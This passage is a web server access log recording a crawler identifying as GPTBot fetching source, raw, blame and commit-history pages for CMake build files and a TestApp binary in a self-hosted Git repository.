(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:20:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:20:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10773] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build" +[17/Feb/2026:15:20:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16188] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build" +[17/Feb/2026:15:20:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21649] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:20:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16187] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build" +[17/Feb/2026:15:20:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:20:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51205] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:21:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51206] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:21:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:21:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51203] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:21:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:21:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:21:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11825] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:21:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:21:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11260] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:21:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11190] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:21:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29810] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14638] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14296] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:21:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11097] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:21:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:21:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:21:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9958] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11021] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:21:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15259] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:21:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16050] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:21:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:21:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10073] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:21:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:21:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12008] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:21:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:21:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9949] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:21:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:21:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10174] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:21:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39741] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:21:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:15:21:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16402] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:21:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:21:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9970] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:21:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:21:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11516] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:21:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:21:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:21:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10019] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr 